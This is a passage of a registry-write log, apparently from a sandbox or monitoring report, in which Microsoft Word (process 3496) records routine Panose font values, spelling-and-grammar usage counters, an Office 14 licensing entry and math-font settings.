HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
020E0503060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
02010502060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
020B0502050101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
020B0509050101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
020E0502050101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
02030509050101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
02010609060101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
020B0304020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
02020603050405020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
03000509000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
03000509000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
020B0602030504020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
020B0A04020102020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
020E0502030303020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
030F0702030302020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
020B0609020204030204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
02030602050306030303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
020B0503020204020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
020B0603020102020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
04040605051002020D02
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
02040502050405020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
02040502050505030304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
02000600000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
020B0603020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
05030102010509060703
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
05050102010205020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
020B0604020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
05020102010507070707
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
05040102010807070707
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
02040602050305030304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
020B0502020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
020B0706040902060204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
05010100010000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
020B0606020202030204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
02020404030301010803
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
03010101010201010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
04020705040A02060702
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
02020602080505020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
04030905020B02020C02
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
02020503060305020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
020E0602020502020306
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
02050806060905020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
02070706080601050204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
020B0903060703020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
04040905080B02020502
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
03060802040406070304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
0207040306080B030204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
02030504050205020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
04020404031007020602
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
04020805060202030203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
0208090404030B020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
0204060206030A020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
030804020302050B0404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
04030604020F02020D02
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
04040505050A02020702
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
02040502050506030303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
04090605060D06020702
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
04040403040A02020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
03050502040202030202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
030304020206070D0D06
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
02040602050505020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
03010101010101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
02060602050505020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
03010101010101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
04030805050802020D02
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
03020802060602070202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
03090702030407020403
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
02070704070505020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
04020502070703030202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
04020502070702020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
03040902040508030806
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
04050602080702020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
03040602040708040804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
040506030A0602020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
02080502050505020702
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
04040805050809020602
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
030604020304060B0204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
04020904020102020604
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
04040A07060A02020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
040409050D0802020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
04020404030D07020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
03070502030502020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
03020602050506090804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
03050402040407070305
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
020A0A07050505020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
020B0602020104020603
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
020B0606020104020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
03040602040607080904
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
02060903040505020403
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
02060603050405020104
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
02060603020205020403
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
03070502040507070304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
03060402040406080204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
02020502060505020804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
02020502060401020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
03070502060502030205
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
030303020206070C0B05
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
02010509020102010303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
020E0502030308020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
020B0509030504030204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
020B0602030504020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
04020605060303030202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
0202090407030B020401
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
02020502050305020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
02030808020601010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
020B0A06020104020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
020B0A02020104020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
020B0506020104020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
020B0502020104020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
020B0902020104020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
04040504061007020D02
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
03020402040607040605
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
020B0606030402020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
020B0903020102020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
020B0706030402020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
020B0703020102020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
020B0503020102020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
03060902040502070203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
04060505060202020A04
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
020B0602030504020804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
020B0402030504020804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
020B0805030504020804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
020B0907030504020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
02090707080505020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
02020904090505020303
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
030303020407070D0804
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
04040404050702020202
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
020E0507020206020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
020E0705020206020404
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
02040604050505020304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
020A0402060406010301
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
02040603050505030304
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
03070402050302030203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
02050604050505020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
02070606080606020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
02070A03080606020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
02070603080606020203
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
04020505051007020D02
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
020F0704030504030204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
020B0503020202020204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
05010101010101010101
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
020B0604030504040204
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
05000500000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
020E0802020502020306
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
020B0803020202020204
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831845
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831846
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831845
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831846
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831862
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831863
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831847
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831848
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831847
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831848
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831864
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831865
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
